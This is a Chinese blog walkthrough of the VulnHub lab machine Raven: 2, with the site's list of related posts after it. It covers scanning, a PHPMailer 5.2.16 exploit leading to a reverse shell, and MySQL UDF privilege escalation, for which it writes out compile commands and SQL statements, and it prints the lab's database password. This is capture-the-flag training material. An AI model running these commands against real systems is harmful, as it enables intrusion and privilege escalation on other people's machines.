vulnhub靶机-Raven: 2

最新推荐文章于 2024-05-13 14:35:53 发布
最新推荐文章于 2024-05-13 14:35:53 发布
阅读量3.7k 收藏 3
点赞数 1
分类专栏: vulnhub靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/121244746
版权

 1、找到靶机ip:192.168.134.130

nmap -sn 192.168.134.0/24

 

 2、扫描靶机端口,开放22、80、111和33222端口

┌──(root💀cracer)-[~]
└─# nmap -p- -A 192.168.134.130
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for raven.local (192.168.134.130)
Host is up (0.00055s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33222/tcp   status
|   100024  1          45202/udp6  status
|   100024  1          47710/tcp6  status
|_  100024  1          51475/udp   status
33222/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:38:9F:A5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms raven.local (192.168.134.130)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.83 seconds

3、访问80端口,默认页面没什么有用的信息,开始扫描目录

         发现一个wordpress网站,访问之后会跳转到raven.local,添加到hosts文件就开始wpscan常规操作,爆破用户名和密码,然后就把它放到一边等待,继续查看其它目录

 

 4、在vendor目录下发现SECURITY.md文件,里面有哪一年的某个版本的PHPMailer容易受到攻击,接着在VERSION中发现版本号位5.2.16

 在kali中搜索相关漏洞利用脚本,发现40974.py脚本符合版本要求

 脚本需要进行一些修改,需要知道网站的绝对路径,能够在前面vendor下的PATH中能够得到flag1和网站的绝对路径

 需要修改的地方如下

使用python3运行脚本,然后监听本地的4444端口,访问根目录下的craker.php文件,成功反弹shell,python提权到tty

 

 使用find命令搜索一下flag文件,得到flag2和flag3

 

 5、提权

最后一个flag应该就是在root目录下了,提权方法是用到mysql的udf提权

在wordpress目录下的wp-config.php文件中能得到mysql的用户名和密码root/R@v3nSecurity,查看mysql的版本发现是5.5.60

 kali搜索mysql udf利用脚本,使用1518.c

 先使用下列命令在本地生成so文件

$ gcc -g -c 1518.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so 1518.o -lc

然后下载到靶机上,方法讲了比较多了,这里不赘述,然后使用下列命令在mysql中创建函数

 * $ mysql -u root -p
 * Enter password:R@v3nSecurity
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';  //跟脚本路径不同
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;

然后利用该函数给find命令赋予s权限

 

最后通过find命令提权,获得flag4

 

 

0ne_
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
raven-for-redux:用于Redux的Raven中间件
02-05
。 不推荐使用 Sentry现在建议使用其新的SDK @sentry/browser而不是Raven。 请查看 ,以获取支持新SDK的该库的API兼容分支! 用于Redux的Raven中间件 注意:需要Raven> = 3.9.0。 Raven 3.14.0有此库触发 将每个调度动作的类型记录为Rreadcrumbs,并将您的上一个动作和当前Redux状态作为附加上下文。 受启发,但略有。 安装 npm install --save raven-for-redux 用法 浏览器 // store.js import Raven from "raven-js" ; // Or, you mig
Redux-中间件原理总结
纾与妤
08-03 727
演化中间件流程演化流程源码解析redux-thunk源码分析redux-saga源码分析 演化流程 参考:官网 我们都知道使用 createStore 创建的 “纯正” store 只支持普通对象类型的 action,而且会立即传到 reducer 来执行。 但是,如果你用 applyMiddleware(中间件) 来套住 createStore 时,middleware 可以修改 action 的执行,并支持执行 dispatch intent(意图)。Intent 一般是异步操作如 Promise、Ob
Vulnhub 靶机: ICA: 1
最新发布
weixin_69670995的博客
05-13 961
进入root目录,查看root.txt文件,这里我使用的是tac命令查看的root.txt文件,因为使用cat命令,会直接执行我们伪造的cat程序,所有我使用的是tac命令,也可以将我们伪造的cat程序删除,就可以使用cat命令执行了。扫描出来的东西很多,使用浏览器访问一下目录,没有什么有用的信息,查看一下首页的源代码,也没有什么有用的信息,一时间没有什么思路,在页面上看到是"qdPM9.2"框架,查看一下kali上有没有这个框架的漏洞。发现开着22,80,3360,使用浏览器访问80端口。
Redux中间件Middleware分析
前端精髓
01-12 361
中间件,它提供的是位于 action 被发起之后,到达 reducer 之前的扩展点,看到图片中middleware 所处的位置没,就是那个地方。 先回顾一下 dispatch 函数的用法 dispatch({type: 'INCREMENT'}) {type: 'INCREMENT'}这个参数我们称为action,Action 本质上是 JavaScript 普通对象。我们约定,action...
【Hack The Box】linux练习-- Irked
人间体佐菲的博客
11-21 295
【Hack The Box】linux练习-- Irked
nest:Raven的软件包管理器
02-04
Raven的软件包管理器。 建立依赖 rustup,提供最新的每晚工具链 建筑巢 编译Nest非常简单: cargo build --all 运行测试 如果要确保在编译Nest时一切正常,可以运行测试: cargo test --all 奔跑的巢 您不应该在不受保护的环境中运行Nest,因为Nest假定当前系统上没有其他软件包管理器。 您仍然可以使用以下命令运行它: cd nest cargo run -- < args> 请参阅下面的可用参数。 用法 nest [OPTION]... SUBCOMMAND [SUBCOMMAND OPTIONS]... Raven-OS's
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
RabbitMQ简介
Mr.薛的博客
09-25 361
RabbitMQ:教程 RabbitMQ实战教程 1.什么是MQ? 消息队列(Message Queue,简称MQ),从字面意思上看,其本质无非就是个队列,FIFO先入先出(排队买票,先到先得,买定离手),只不过队列中存放的内容是message而已。 其主要用途:不同的进程Process/线程Thread之间通信。 为什么会产生消息队列?有几个原因: 不同进程(proess)之间传递消...
中间件客户端配置中的域名与IP
zollty的专栏
12-21 635
问题说明及其背景 某些中间件的客户端配置中,会有集群的地址列表(数组),典型的如zookeeper的地址列表: 192.168.0.1:2181,192.168.0.2:2181 聪明的运维同学,喜欢把它弄成域名,第一种是一个域名解析为多个IP(起到负载均衡作用): zk.if.zollty.com:2181 第二种是一个域名解析为一个IP(可以方便修改IP),例如: zk01.if.zollty.com:2181,zk02.if.zollty.com:2181 ...
DC靶机系列:DC-1
Ays.Ie的博客
02-22 586
本篇文章为DC系列第一个靶机,后续会持续更新DC系列其他靶机的渗透过程及思路,也会更新其他靶场的渗透内容,希望能够帮助有需要的同学
1、靶机——Pinkys-Place v3(1)
qq_55202378的博客
09-20 642
Pinkys-Place
kali与靶机网络配置问题
leo788的博客
01-04 3061
前提:kali宿主机和靶机都使用的NAT网络配置,然而无论是arp-scan还是nmap还是netdiscover都找不到靶机ip,正常情况下可以找到。
Vulnhub靶场,Jangow靶机环境找不到ip解决方法。
m0_64376783的博客
04-14 716
删除etc得到了/ vim /etc 接着补全 vim /etc/network 回车看见网卡界面。先配置好,因为扫描的时候会扫不到ip 网络模式调节为桥接模式,然后开机,按e键,进入编辑模式输入。pwd 查看目录 cd init.d 进入目录,ls查看,看见networking。小小挫折,自己解决,那当然是不可能的。要进入vim /etc/network/interfaces 修改网卡。尝试关机重启,重启以后一直在加载,说明没有效果,方法行不通。ip a查看 网卡ens33 斜杠打不了,只能一步步进入。
DC-1靶机渗透
weixin_62485906的博客
06-23 1289
关于kali渗透DC-1靶机
DC-3靶机学习笔记
浅时光-Trister
08-26 534
DC-3靶机学习笔记
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值